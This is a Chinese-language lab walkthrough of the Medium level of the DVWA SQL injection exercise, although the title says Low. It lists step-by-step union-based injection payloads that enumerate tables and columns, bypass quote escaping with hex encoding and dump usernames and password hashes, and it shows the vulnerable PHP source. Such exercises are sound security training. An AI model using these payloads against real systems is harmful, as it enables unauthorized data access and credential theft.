DVWA--SQL注入(SQL Injection)--Low
目录
级别:Medium
Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。虽然前端使用了下拉选择菜单,但我们依然可以通过抓包改参数,提交恶意构造的查询参数。所以就用到了抓包软件burpsuite以及服务器的代理设置。
1、查看POST请求
2、hackbar提交POST请求
切换到hackbar-->Load URL-->Post Data输入id=3&Submit=Submit
3、输入',报错,判断为数字型注入
4、猜测SQL查询的字段数
由下面结果可知,SQL查询结果字段数为2
id=1 order by 2 &Submit=Submit #查询成功
id=1 order by 4 &Submit=Submit #查询失败
id=1 order by 3 &Submit=Submit #查询失败
5、确定回显的位置
id=1 union select 1,2 &Submit=Submit
6、获取当前数据库及版本信息
id=1 and 1=2 union select database(),version() &Submit=Submit
7、获取数据库中表信息(group_concat())
id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() &Submit=Submit
8、获取表字段
因为单引号会被转义,故需要绕过转义,可使用16进制绕过
字符串-十六进制转换:https://zixuephp.net/tool-str-hex.html
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' &Submit=Submit
因单引号被转义报错:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'users\'' at line 1
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 # &Submit=Submit
9、获取用户信息
id=1 and 1=2 union select user,password from users # &Submit=Submit
10、密文解码
后台源码
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>